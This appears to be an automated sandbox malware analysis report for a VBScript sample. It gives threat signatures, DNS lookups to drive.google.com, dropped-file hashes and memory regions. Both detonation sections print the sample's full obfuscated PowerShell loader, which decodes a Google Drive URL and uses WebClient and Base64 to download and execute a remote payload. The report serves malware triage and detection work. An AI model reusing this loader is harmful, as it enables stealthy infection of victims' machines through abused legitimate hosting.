Malware Analysis Report

2025-01-18 02:19

Sample ID 240613-bqkxdsyflb
Target 24dac6b183fc5cb29533742b3e54f209.bin
SHA256 688671fcf92adabafc63e4833b50f9730bab3a3295848589c2720f0e34462225
Tags
execution
score
6/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
6/10

SHA256

688671fcf92adabafc63e4833b50f9730bab3a3295848589c2720f0e34462225

Threat Level: Shows suspicious behavior

The file 24dac6b183fc5cb29533742b3e54f209.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

execution

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-13 01:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 01:20

Reported

2024-06-13 01:23

Platform

win7-20240508-en

Max time kernel

144s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "$Personliste = 1;$Binomialkoefficientens='';Function Superbusily($Livvidde){$Chrysothrix=$Livvidde.Length-$Personliste;$Servility=$Binomialkoefficientens+'Substring';For( $Ignoreringen=7;$Ignoreringen -lt $Chrysothrix;$Ignoreringen+=8){$bytrafik+=$Livvidde.$Servility.Invoke( $Ignoreringen, $Personliste);}$bytrafik;}function Outhue($Gaspedalens){ . ($Spasmolytically) ($Gaspedalens);}$Prvetekstens=Superbusily 'TinkturMphilosoo,nalterzS.ainleiSsp.jdelEneherslAstroloaEliks,r/Ru,idum5Undivid.Multinu0 ilians Cons.ab(PrveudsWtown,eaiRadbuganByggefod Mi,troo Fysik,w unnomas kek.te M,ulanaNOffent,TSpender Untramp1firedel0 dibenz.,igtana0 arrowi; Udbry. Und.rfoW Unb.waiGr,vsmenSeksual6 proede4 ,ynebe; Taktfa Registx For,rg6 adduce4Vekselr;st,dent Ruge.sprLocus.ivUn moke:Re,nves1 tautol2 Insinu1Eng evi.Kulmine0de.embr)Postpat Impo tuGCarcinoeorgi,stcComputekOphedenohovedsk/ Gaader2infleks0Renssan1Kvgsmis0Erhverv0Opslags1Jeremys0emballe1V.ginis Res.skFSvikml iGste.rer udbredeU combifGe.dannokitsdogx Efterh/Superco1 S oleb2Ynkelig1Volplan.Boldspi0 Deepin ';$Salgsvarerne=Superbusily ' F glefUf,ldauts Aboli.edesertarFreder.-RekursiAsalam.ng GordiaeRhombohnBa,ehtttO.nifor ';$nucleole=Superbusily 'AfstreghStorebrtNutc,ketVerdenspniddin.sQuac le:Mariali/Samarit/ Signa,dJasminerOpskresiA etyltvFolkedreNe gang.Le,ekasgStj,mpeoUnshunnoRentekogf,lserulIndh,ntePr mrpr.Defacinclevo,ucoudkradsm.taalig/S.rmoneu Unascec Uncomp?Tikmpere MotacixVenizelp HovedboRekomperklis.ertEuphono=HomophodSplenetoHelgenswbaadeh.nAbbrevilP.essero Be.utyaUroleucdDrmmesl&Quai eriTeknokrdHakkapi=Oxidise1 ,nciderSammenkrDagbrknbMor,enazTralledlbipinnaq SalthoYUnderbiRMo.ndinL NathasCKoeksissexten.alinaktivPSpha,roKA.lurenLGennems1rendejeyChrys.pp CouthsoUnderdr1bnskrafFFod,oldEmis urn1StraaliuHypnotiOSprachlkLoes,es3VoltospKPr.depeJKnhjdenaDalagamW LagdefKRu.dten ';$Beaandingens=Superbusily 'Lighter>gre.twh ';$Spasmolytically=Superbusily 'scorneri Ufo.tveBogtrykxBanesaa ';$Munkerup='Bankerotten';$Idrttens = Superbusily '.ihiliseGhu mulcNaadesthBadekaao muskie Par.elr%,ladtrya Refr.spSnortlepPenneprdgen.nskaJorganst SociolaPa,anuc%Ar.ogra\Te.charFCre enyi Temperd LindyseSluknt,is alinokFjerneno Ousterm F.rbrumDeceleri Overr.sLimstensBlgetopa WhilterDramatiiRoughfos Reoff k Palladehailstos Electr.MainfraSA judanlOrohydra,arobes Katikc &acrorha&Lipect, ImodstoeAmarantcLithotrhNonviraoRubb.ri StasiditMonokro ';Outhue (Superbusily 'Var etp$Staggerg Nasturl CarpinoParadokb Enst.vaClor,gelIn.esba:OdiscotsPa,tisorTrimorpgwant.nseutvetydf Kom.etlS praseoTaagetarFlyndereKursusmn avan.eeDemagogs bol,je= Adaman(Led,ggacFlamme m Shar idSvr,eds Skilten/B,nkbesc Highto nononer$ WondroI DusrjgdLandganrTantalitEksporttS.bningeInd lagnFaineansGilrava)Partner ');Outhue (Superbusily ' Coadju$GoaledogNnnen.elPanosteo.lejencbSumm tiaLig stilTrickli:sammentSKon raklApterinaSk,devapaf egnesBelomant Hektari ParthecUsigelikAnonolj=Plurip.$layloclnPachucouImplemecAstrobilOpslidse EjerlaoLrerf rlPrincewePapirp . Ubesvasauto trp NaboinlSuperheiKohrenttMejerie(Div,rce$InclipsBSynl gheChefkriahaevespaStopfodnInvaliddRabbitiiDe,entrnRewiresgUvealtoeU.recogntilplanslate,op)Tobacco ');$nucleole=$Slapstick[0];$Overgild= (Superbusily ' ymphom$GestaltgGenforelAkkumuloPrfer.nbUncorreaF,rhaanlAflyse :Vin ergSOutseekuGloppyhb PoliticSandhe,uCervinatSvedkiriJunkb,as ArmbeveHaspninsKnappyg=KopskatNbeskytteFjernstwFolkere-serg,lrO Hum.nmb hattiojdiskoteeRumnskecNonvolutaarsb.r KoreishS OlaviayHejsevrsMedusiftIltendeeSt.esermMapmaki.UnputriNHemmelieHistioltant.rea.ChauffeW TyranteSoc.alab re,derCoverderlRet.pleiAl,amiaeflippinnSkuflert');$Overgild+=$srgeflorenes[1];Outhue ($Overgild);Outhue (Superbusily 'Hrerrsf$PresynaSTerrazzuDok.tnibhagridicUforeneu.oncinntTeatersiNedsablsM asbygeTeltligsForespr.Decim lHBestormeFortrstaS,uirtidKasseapeKulturprG,ldfiss Antisp[Wo msee$ Medi,bSBredsdoaKvartsulHjemsengPreinjusPaxamprv Forv.la SissonrLyknskneArrearirHaeldten OutimaeBlurred]Forsvar=Or cula$EksisteP G benerToluid v NematoeVitrioltsvr.gteeNotoneck bab.lisCaricattOsogambedzoti.hn .ambods Horror ');$astringeringernes=Superbusily 'Idyllic$StatsfnSDemonteuCifbittb Overs,cBrasseyu FireletPyrr.lbiTerpolysEfteraaeModeordsH.vedba. VenkesDSeniorso Topob wrigor.snTjekkerl.eisminoTestkrsaBeothukd.oldjesF FyringiReflexelAmtsraae Gase.u( fldern$UricuronForegriuCapaletcSmdend.lBo,tedeeDolesfao Terapel Enh.nceNonrequ,Voldtgt$Pr.arbidS,egepaa Vagtstmlsk.dednNasalitaStradintPr genioGundesprDefrosty Tawesu)Kalk,la ';$damnatory=$srgeflorenes[0];Outhue (Superbusily 'marimba$W nterigTulisa lPlutonioSlavehabDelineaaNonargulLeptoce: araffiG LevedyyFilibuslMilieupdBre,vekiSkriblegAp.theohInquilieAsminesdopdukke2B.ossep3Galning3Slagt.s=Typwkul( Grupp,TstemplieArbejdesWirosc,tTreade.-applikaPMassersaSp.serntTeltdughMimeogr Udbrede$Transf,dSkrabnsaDemokramD.ovedhn UdvandaLayeragtAntisemoTowpathrisocyanyStruggl)Exsus i ');while (!$Gyldighed233) {Outhue (Superbusily 'Tvangsa$NewcolcgSkr.atolOpslidnoPhilolobFunnimeaEspaceml,altern:ClearinPKnastakeBrandforPatent,vFrikenda.oyarsslCotterhvInsula.aStrenger Manicu=cuppens$F,rurentUnemendrZurliteuJonos,re Freder ') ;Outhue $astringeringernes;Outhue (Superbusily 'AnfordrSparsleytReedieraSyvmiler nddatattimetal-.remsesS HypoamlPustersedroskebeAfmeldepKo,omip Bvelses4Solos.n ');Outhue (Superbusily ' ysiote$UdenriggBrnevenlBond.paoExtensubSevartwaPup idslOscillo:IntercoG De finyIridizalCoitaled Pr,ktiiMvhp,angUdsprinh MeseegeOk oberdVandlaa2Svanges3Reg.nte3Es roge=.anetti( forwarTvinc,nzeSu,chlosliersbatHar,eni-HovedpuP Ve,denaTotitivtHemiopihNetoper Madrepo$Koesem,d Ka.egoa Indsaam PituitnBrothiea DoomhotLo rdesoHulketmrTyssendyHortiku) Croose ') ;Outhue (Superbusily 'Singale$Cokyshig ormulal NaturmoambiencbVantguaaCalligrlF,annel:SpillepAJagtprouFaglitttErgometoGenansklSkade.ryUdfyldtcA,pehoru Venstrs dignit=Nylonsp$DecostagEliminelSti.lepo Tipoldbenle.fdaReallnslDecrimi:UntheisAVaccinenUd yndegCheeseme Reg.nelUdtydnifGangartiRejehopsTeatersh,irknineSkibs,asMaski,s+Ejefald+Spiseb.%Opposit$Feci.lbS aturallForew,eaKlbestrp Hoveris misfo.thawkmotiDybhavscUderumskFiskeku.Unlethac SeksteoRec,rbouBrunel nDesa,metPhotpho ') ;$nucleole=$Slapstick[$Autolycus];}$Rjsernes=333842;$Definitionernes=30113;Outhue (Superbusily 'Rutilan$SpecialgFrustrelU dvrlioPepitatbPigletcaFel.adhlMendels: C,ffinC S.lonkiParamutl ProduklA.leygaemul,angrChl.ropyKlippe. S rafpo=Iliocos IndtgtGClawsnoeForfaretHvn,err- UautorCUnd.rshoOpbevarn no,exptGlucon.eParlam,nindirectPetr li cryptoc$.pegepldDemagogaBlivesmmAntiantn flerspa EksametStrainao Udlig rdrspiony Succum ');Outhue (Superbusily 'Haavard$Spad efgTristezl aproctoDeco.orbMelonryaDelmomelAbl.cta:V,ndprvAkluk atn F,ttoge FlaffesMiracu tManubrihFederaleUrinaletUnphiloiKha,arfzNaivisme Oarf,s Martyn= udhol Th,irse[Dahlia SLength,y IsvintsVerden.t UnrumoeDinornimModef.l.VendetaCJoyprooo Honni.nB rgninvDisco.ye AfskrarDugpunktPhototr]Unmolde: rader,: SommerF Benz.nrS.dpudeoSlgtsfem AncienBEffulgea KedushsForbilleMetam.r6Epigene4BunchbaSAandendtcausewarVac.inaiEyeshadnSpl chngDefinie(Soigner$M gdepaCIno erci allotl Biklanl SyphoneOberstirSubstriySummon.) Tilbag ');Outhue (Superbusily ' Re,ros$Sw.thergOstracolFedes.ioB,slagsb AzandeaBelevnel Artles:Friskh TWash dlu ExtracmGuesserpSkytteklConstitiAmpelidndabblineHimen,f Trilleb=Sektion Hellang[ efloccSEudaimoyUn.andssPangaratTi,trnge HarengmSeismog.straf,eTPolydemeTristicx.efloattGennems.Fo teraEAdsprednObscurac FletteoTantal.dKreditgiChromatnEksterngKartere]Unaggra:Unsatir:MoseegmAP,rmafrSPokerisCArchimpIAbalienITvivlsw.PegepinGSnustobeMave,netBesotscSK,ressetPlat yfr SexoloiFormumnn F,libugFormaak(Angstfu$.oneybeAAgricsynGudet,mePljtelesBeflendt Disperh VandroeTransvetEfter,ri SmaglszMarisaseBr eraa)Kdetrkb ');Outhue (Superbusily 'Cotehel$ Vaun.hgArchie l Retsopo KontrobFreshenaSubs.anlWale ty:Re,ubliFDr coceoDv.geflrFoveolee OveropsDe.oaguk PropenrSyge.ikiHulrumbvEn cture MistralEnfiressOrdkriteEnma dsrGangbessafs.ori=Forsyth$rectifiTKrigsk,uOve.sttmDelingspLimberel Antirei Brach,nExecra eEngrosp.JordspesShrimpiuKodekseb MyrernsNon,portSpr tkrrPer,onaiPreco,snPlebeiag Monato(Liftgat$e oismsRTremblyjBefrielsToneflge PteridrForla snSvigerseMas incsArren t,Or,anis$Finhak DRundskaeSu arytfGob esoi DisdennFiktio,iUmennestP eceabiUdbandtoMi osfin EdeltreSvibl,nrKrselsfnDrt,inseContinusEpicond)Ind,cie ');Outhue $Foreskrivelsers;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fideikommissariskes.Sla && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp

Files

C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt

MD5 1bdacc28017d2adeab8c40b68e30acfd
SHA1 94ac78a16d912649ddb9421ddf3017aed9556660
SHA256 5c0997916dcf6961681d53886efa088f514aa237301c311ab3cabaab526b2744
SHA512 409d19810ea569da7fdbf73d916958e39ac2853124b289217e3c9d7ebac9ce225ff954663938a381244d4f82b890ac0094f060ba8ac2e2882856f45f13d864ef

memory/1976-328-0x000007FEF585E000-0x000007FEF585F000-memory.dmp

memory/1976-329-0x000000001B530000-0x000000001B812000-memory.dmp

memory/1976-330-0x0000000002310000-0x0000000002318000-memory.dmp

memory/1976-331-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

memory/1976-332-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

memory/1976-333-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

memory/1976-334-0x000007FEF585E000-0x000007FEF585F000-memory.dmp

memory/1976-335-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 01:20

Reported

2024-06-13 01:23

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "$Personliste = 1;$Binomialkoefficientens='';Function Superbusily($Livvidde){$Chrysothrix=$Livvidde.Length-$Personliste;$Servility=$Binomialkoefficientens+'Substring';For( $Ignoreringen=7;$Ignoreringen -lt $Chrysothrix;$Ignoreringen+=8){$bytrafik+=$Livvidde.$Servility.Invoke( $Ignoreringen, $Personliste);}$bytrafik;}function Outhue($Gaspedalens){ . ($Spasmolytically) ($Gaspedalens);}$Prvetekstens=Superbusily 'TinkturMphilosoo,nalterzS.ainleiSsp.jdelEneherslAstroloaEliks,r/Ru,idum5Undivid.Multinu0 ilians Cons.ab(PrveudsWtown,eaiRadbuganByggefod Mi,troo Fysik,w unnomas kek.te M,ulanaNOffent,TSpender Untramp1firedel0 dibenz.,igtana0 arrowi; Udbry. Und.rfoW Unb.waiGr,vsmenSeksual6 proede4 ,ynebe; Taktfa Registx For,rg6 adduce4Vekselr;st,dent Ruge.sprLocus.ivUn moke:Re,nves1 tautol2 Insinu1Eng evi.Kulmine0de.embr)Postpat Impo tuGCarcinoeorgi,stcComputekOphedenohovedsk/ Gaader2infleks0Renssan1Kvgsmis0Erhverv0Opslags1Jeremys0emballe1V.ginis Res.skFSvikml iGste.rer udbredeU combifGe.dannokitsdogx Efterh/Superco1 S oleb2Ynkelig1Volplan.Boldspi0 Deepin ';$Salgsvarerne=Superbusily ' F glefUf,ldauts Aboli.edesertarFreder.-RekursiAsalam.ng GordiaeRhombohnBa,ehtttO.nifor ';$nucleole=Superbusily 'AfstreghStorebrtNutc,ketVerdenspniddin.sQuac le:Mariali/Samarit/ Signa,dJasminerOpskresiA etyltvFolkedreNe gang.Le,ekasgStj,mpeoUnshunnoRentekogf,lserulIndh,ntePr mrpr.Defacinclevo,ucoudkradsm.taalig/S.rmoneu Unascec Uncomp?Tikmpere MotacixVenizelp HovedboRekomperklis.ertEuphono=HomophodSplenetoHelgenswbaadeh.nAbbrevilP.essero Be.utyaUroleucdDrmmesl&Quai eriTeknokrdHakkapi=Oxidise1 ,nciderSammenkrDagbrknbMor,enazTralledlbipinnaq SalthoYUnderbiRMo.ndinL NathasCKoeksissexten.alinaktivPSpha,roKA.lurenLGennems1rendejeyChrys.pp CouthsoUnderdr1bnskrafFFod,oldEmis urn1StraaliuHypnotiOSprachlkLoes,es3VoltospKPr.depeJKnhjdenaDalagamW LagdefKRu.dten ';$Beaandingens=Superbusily 'Lighter>gre.twh ';$Spasmolytically=Superbusily 'scorneri Ufo.tveBogtrykxBanesaa ';$Munkerup='Bankerotten';$Idrttens = Superbusily '.ihiliseGhu mulcNaadesthBadekaao muskie Par.elr%,ladtrya Refr.spSnortlepPenneprdgen.nskaJorganst SociolaPa,anuc%Ar.ogra\Te.charFCre enyi Temperd LindyseSluknt,is alinokFjerneno Ousterm F.rbrumDeceleri Overr.sLimstensBlgetopa WhilterDramatiiRoughfos Reoff k Palladehailstos Electr.MainfraSA judanlOrohydra,arobes Katikc &acrorha&Lipect, ImodstoeAmarantcLithotrhNonviraoRubb.ri StasiditMonokro ';Outhue (Superbusily 'Var etp$Staggerg Nasturl CarpinoParadokb Enst.vaClor,gelIn.esba:OdiscotsPa,tisorTrimorpgwant.nseutvetydf Kom.etlS praseoTaagetarFlyndereKursusmn avan.eeDemagogs bol,je= Adaman(Led,ggacFlamme m Shar idSvr,eds Skilten/B,nkbesc Highto nononer$ WondroI DusrjgdLandganrTantalitEksporttS.bningeInd lagnFaineansGilrava)Partner ');Outhue (Superbusily ' Coadju$GoaledogNnnen.elPanosteo.lejencbSumm tiaLig stilTrickli:sammentSKon raklApterinaSk,devapaf egnesBelomant Hektari ParthecUsigelikAnonolj=Plurip.$layloclnPachucouImplemecAstrobilOpslidse EjerlaoLrerf rlPrincewePapirp . Ubesvasauto trp NaboinlSuperheiKohrenttMejerie(Div,rce$InclipsBSynl gheChefkriahaevespaStopfodnInvaliddRabbitiiDe,entrnRewiresgUvealtoeU.recogntilplanslate,op)Tobacco ');$nucleole=$Slapstick[0];$Overgild= (Superbusily ' ymphom$GestaltgGenforelAkkumuloPrfer.nbUncorreaF,rhaanlAflyse :Vin ergSOutseekuGloppyhb PoliticSandhe,uCervinatSvedkiriJunkb,as ArmbeveHaspninsKnappyg=KopskatNbeskytteFjernstwFolkere-serg,lrO Hum.nmb hattiojdiskoteeRumnskecNonvolutaarsb.r KoreishS OlaviayHejsevrsMedusiftIltendeeSt.esermMapmaki.UnputriNHemmelieHistioltant.rea.ChauffeW TyranteSoc.alab re,derCoverderlRet.pleiAl,amiaeflippinnSkuflert');$Overgild+=$srgeflorenes[1];Outhue ($Overgild);Outhue (Superbusily 'Hrerrsf$PresynaSTerrazzuDok.tnibhagridicUforeneu.oncinntTeatersiNedsablsM asbygeTeltligsForespr.Decim lHBestormeFortrstaS,uirtidKasseapeKulturprG,ldfiss Antisp[Wo msee$ Medi,bSBredsdoaKvartsulHjemsengPreinjusPaxamprv Forv.la SissonrLyknskneArrearirHaeldten OutimaeBlurred]Forsvar=Or cula$EksisteP G benerToluid v NematoeVitrioltsvr.gteeNotoneck bab.lisCaricattOsogambedzoti.hn .ambods Horror ');$astringeringernes=Superbusily 'Idyllic$StatsfnSDemonteuCifbittb Overs,cBrasseyu FireletPyrr.lbiTerpolysEfteraaeModeordsH.vedba. VenkesDSeniorso Topob wrigor.snTjekkerl.eisminoTestkrsaBeothukd.oldjesF FyringiReflexelAmtsraae Gase.u( fldern$UricuronForegriuCapaletcSmdend.lBo,tedeeDolesfao Terapel Enh.nceNonrequ,Voldtgt$Pr.arbidS,egepaa Vagtstmlsk.dednNasalitaStradintPr genioGundesprDefrosty Tawesu)Kalk,la ';$damnatory=$srgeflorenes[0];Outhue (Superbusily 'marimba$W nterigTulisa lPlutonioSlavehabDelineaaNonargulLeptoce: araffiG LevedyyFilibuslMilieupdBre,vekiSkriblegAp.theohInquilieAsminesdopdukke2B.ossep3Galning3Slagt.s=Typwkul( Grupp,TstemplieArbejdesWirosc,tTreade.-applikaPMassersaSp.serntTeltdughMimeogr Udbrede$Transf,dSkrabnsaDemokramD.ovedhn UdvandaLayeragtAntisemoTowpathrisocyanyStruggl)Exsus i ');while (!$Gyldighed233) {Outhue (Superbusily 'Tvangsa$NewcolcgSkr.atolOpslidnoPhilolobFunnimeaEspaceml,altern:ClearinPKnastakeBrandforPatent,vFrikenda.oyarsslCotterhvInsula.aStrenger Manicu=cuppens$F,rurentUnemendrZurliteuJonos,re Freder ') ;Outhue $astringeringernes;Outhue (Superbusily 'AnfordrSparsleytReedieraSyvmiler nddatattimetal-.remsesS HypoamlPustersedroskebeAfmeldepKo,omip Bvelses4Solos.n ');Outhue (Superbusily ' ysiote$UdenriggBrnevenlBond.paoExtensubSevartwaPup idslOscillo:IntercoG De finyIridizalCoitaled Pr,ktiiMvhp,angUdsprinh MeseegeOk oberdVandlaa2Svanges3Reg.nte3Es roge=.anetti( forwarTvinc,nzeSu,chlosliersbatHar,eni-HovedpuP Ve,denaTotitivtHemiopihNetoper Madrepo$Koesem,d Ka.egoa Indsaam PituitnBrothiea DoomhotLo rdesoHulketmrTyssendyHortiku) Croose ') ;Outhue (Superbusily 'Singale$Cokyshig ormulal NaturmoambiencbVantguaaCalligrlF,annel:SpillepAJagtprouFaglitttErgometoGenansklSkade.ryUdfyldtcA,pehoru Venstrs dignit=Nylonsp$DecostagEliminelSti.lepo Tipoldbenle.fdaReallnslDecrimi:UntheisAVaccinenUd yndegCheeseme Reg.nelUdtydnifGangartiRejehopsTeatersh,irknineSkibs,asMaski,s+Ejefald+Spiseb.%Opposit$Feci.lbS aturallForew,eaKlbestrp Hoveris misfo.thawkmotiDybhavscUderumskFiskeku.Unlethac SeksteoRec,rbouBrunel nDesa,metPhotpho ') ;$nucleole=$Slapstick[$Autolycus];}$Rjsernes=333842;$Definitionernes=30113;Outhue (Superbusily 'Rutilan$SpecialgFrustrelU dvrlioPepitatbPigletcaFel.adhlMendels: C,ffinC S.lonkiParamutl ProduklA.leygaemul,angrChl.ropyKlippe. S rafpo=Iliocos IndtgtGClawsnoeForfaretHvn,err- UautorCUnd.rshoOpbevarn no,exptGlucon.eParlam,nindirectPetr li cryptoc$.pegepldDemagogaBlivesmmAntiantn flerspa EksametStrainao Udlig rdrspiony Succum ');Outhue (Superbusily 'Haavard$Spad efgTristezl aproctoDeco.orbMelonryaDelmomelAbl.cta:V,ndprvAkluk atn F,ttoge FlaffesMiracu tManubrihFederaleUrinaletUnphiloiKha,arfzNaivisme Oarf,s Martyn= udhol Th,irse[Dahlia SLength,y IsvintsVerden.t UnrumoeDinornimModef.l.VendetaCJoyprooo Honni.nB rgninvDisco.ye AfskrarDugpunktPhototr]Unmolde: rader,: SommerF Benz.nrS.dpudeoSlgtsfem AncienBEffulgea KedushsForbilleMetam.r6Epigene4BunchbaSAandendtcausewarVac.inaiEyeshadnSpl chngDefinie(Soigner$M gdepaCIno erci allotl Biklanl SyphoneOberstirSubstriySummon.) Tilbag ');Outhue (Superbusily ' Re,ros$Sw.thergOstracolFedes.ioB,slagsb AzandeaBelevnel Artles:Friskh TWash dlu ExtracmGuesserpSkytteklConstitiAmpelidndabblineHimen,f Trilleb=Sektion Hellang[ efloccSEudaimoyUn.andssPangaratTi,trnge HarengmSeismog.straf,eTPolydemeTristicx.efloattGennems.Fo teraEAdsprednObscurac FletteoTantal.dKreditgiChromatnEksterngKartere]Unaggra:Unsatir:MoseegmAP,rmafrSPokerisCArchimpIAbalienITvivlsw.PegepinGSnustobeMave,netBesotscSK,ressetPlat yfr SexoloiFormumnn F,libugFormaak(Angstfu$.oneybeAAgricsynGudet,mePljtelesBeflendt Disperh VandroeTransvetEfter,ri SmaglszMarisaseBr eraa)Kdetrkb ');Outhue (Superbusily 'Cotehel$ Vaun.hgArchie l Retsopo KontrobFreshenaSubs.anlWale ty:Re,ubliFDr coceoDv.geflrFoveolee OveropsDe.oaguk PropenrSyge.ikiHulrumbvEn cture MistralEnfiressOrdkriteEnma dsrGangbessafs.ori=Forsyth$rectifiTKrigsk,uOve.sttmDelingspLimberel Antirei Brach,nExecra eEngrosp.JordspesShrimpiuKodekseb MyrernsNon,portSpr tkrrPer,onaiPreco,snPlebeiag Monato(Liftgat$e oismsRTremblyjBefrielsToneflge PteridrForla snSvigerseMas incsArren t,Or,anis$Finhak DRundskaeSu arytfGob esoi DisdennFiktio,iUmennestP eceabiUdbandtoMi osfin EdeltreSvibl,nrKrselsfnDrt,inseContinusEpicond)Ind,cie ');Outhue $Foreskrivelsers;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fideikommissariskes.Sla && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp

Files

C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt

MD5 714cb325c3d69ffdf652293ead3d50b1
SHA1 f79daa74b0ff2c765007c8b0e22a3bedb05ba5a6
SHA256 641832d41890d7f88f0ebbbd45d1168bfdb199408820ee139e1f2c8d0b62587d
SHA512 816a67a4407ec8850ed9fa0dde87f5c5dd6959e68b378865a338f6253d1e0a9ff51dc63c85497491dafd29b53b96702e08c937017eb2ba6d3ea7bfffbe6da07a

C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt

MD5 5791b2b2b17aa013def1da16dcbc8ab3
SHA1 841fcae50ddd7f66b105744deae2d3424762ba1b
SHA256 3f153f741aa814f65701c4f2ad0d97a53049e30148a9a48437434fb6a971b38b
SHA512 82391bb1c6ea2b006982bce3da12e564afa965cc603e1ecac5b42ca02b44f768ded0f12979c4a6b5b926e333e53402b20cf7040f3042ead16e84d25714aca1fa

C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt

MD5 1bdacc28017d2adeab8c40b68e30acfd
SHA1 94ac78a16d912649ddb9421ddf3017aed9556660
SHA256 5c0997916dcf6961681d53886efa088f514aa237301c311ab3cabaab526b2744
SHA512 409d19810ea569da7fdbf73d916958e39ac2853124b289217e3c9d7ebac9ce225ff954663938a381244d4f82b890ac0094f060ba8ac2e2882856f45f13d864ef

memory/4296-317-0x00007FFB51493000-0x00007FFB51495000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lyfjnhny.ldt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4296-327-0x000002087C9A0000-0x000002087C9C2000-memory.dmp

memory/4296-328-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp

memory/4296-329-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp

memory/4296-330-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp

memory/4296-331-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp

memory/4296-332-0x00007FFB51493000-0x00007FFB51495000-memory.dmp

memory/4296-333-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp

memory/4296-334-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp